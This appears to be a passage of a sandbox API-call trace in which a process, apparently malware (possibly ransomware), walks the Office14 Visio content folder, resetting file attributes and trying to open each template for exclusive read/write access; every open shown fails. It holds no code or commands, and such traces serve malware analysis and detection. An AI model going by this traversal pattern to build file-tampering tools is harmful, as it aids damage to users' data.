[0137.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLRPLN_U.VST", dwFileAttributes=0x80) returned 0 [0137.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLRPLN_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\flrpln_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.991] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.991] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPALL_M.VST", dwFileAttributes=0x80) returned 0 [0137.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPALL_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpall_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.991] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.991] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.992] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.992] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPALL_U.VST", dwFileAttributes=0x80) returned 0 [0137.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPALL_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpall_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.992] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.992] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.992] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.992] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPASSM_M.VSS", dwFileAttributes=0x80) returned 0 [0137.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPASSM_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpassm_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.993] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.993] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPASSM_U.VSS", dwFileAttributes=0x80) returned 0 [0137.993] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPASSM_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpassm_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.993] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.993] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.993] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.993] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPEQP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPEQP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpeqp_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.995] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.995] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPEQP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPEQP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpeqp_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.995] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.995] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.996] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.996] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.996] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPVALV_M.VSS", dwFileAttributes=0x80) returned 0 [0137.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPVALV_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpvalv_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.996] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.996] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.996] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.997] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPVALV_U.VSS", dwFileAttributes=0x80) returned 0 [0137.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FPVALV_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fpvalv_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.998] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.998] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.998] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FREEQP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FREEQP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\freeqp_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.999] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.999] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.999] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.999] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FREEQP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FREEQP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\freeqp_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.999] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.999] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.000] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.000] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FURN_M.VSS", dwFileAttributes=0x80) returned 0 [0138.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FURN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\furn_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.000] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.000] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.000] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FURN_U.VSS", dwFileAttributes=0x80) returned 0 [0138.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FURN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\furn_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.001] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.001] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANESA_M.VSS", dwFileAttributes=0x80) returned 0 [0138.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANESA_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ganesa_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.001] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.001] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.001] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANESA_U.VSS", dwFileAttributes=0x80) returned 0 [0138.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANESA_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ganesa_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.002] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_M.VSS", dwFileAttributes=0x80) returned 0 [0138.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\gantt_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.002] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_M.VST", dwFileAttributes=0x80) returned 0 [0138.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\gantt_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.003] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.003] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_U.VSS", dwFileAttributes=0x80) returned 0 [0138.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\gantt_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.003] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.003] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.004] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_U.VST", dwFileAttributes=0x80) returned 0 [0138.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GANTT_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\gantt_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.004] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.005] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.005] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GARDEN_M.VSS", dwFileAttributes=0x80) returned 0 [0138.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GARDEN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\garden_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.005] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.005] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.005] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GARDEN_U.VSS", dwFileAttributes=0x80) returned 0 [0138.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GARDEN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\garden_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.006] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.006] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GDT_M.VSS", dwFileAttributes=0x80) returned 0 [0138.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GDT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\gdt_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.006] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.006] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.006] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GDT_U.VSS", dwFileAttributes=0x80) returned 0 [0138.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\GDT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\gdt_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.007] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.007] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.007] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HOMPLN_M.VST", dwFileAttributes=0x80) returned 0 [0138.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HOMPLN_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hompln_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.007] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.007] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.007] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.007] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HOMPLN_U.VST", dwFileAttributes=0x80) returned 0 [0138.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HOMPLN_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hompln_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.008] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.008] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.008] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.008] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.008] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACCE_M.VSS", dwFileAttributes=0x80) returned 0 [0138.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACCE_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvacce_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.009] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.009] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.009] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.009] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACCE_U.VSS", dwFileAttributes=0x80) returned 0 [0138.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACCE_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvacce_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.009] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.009] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.010] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.010] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACC_M.VSS", dwFileAttributes=0x80) returned 0 [0138.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACC_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvacc_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.010] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.010] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.011] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACC_U.VSS", dwFileAttributes=0x80) returned 0 [0138.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACC_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvacc_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.011] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.011] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACD_M.VSS", dwFileAttributes=0x80) returned 0 [0138.011] 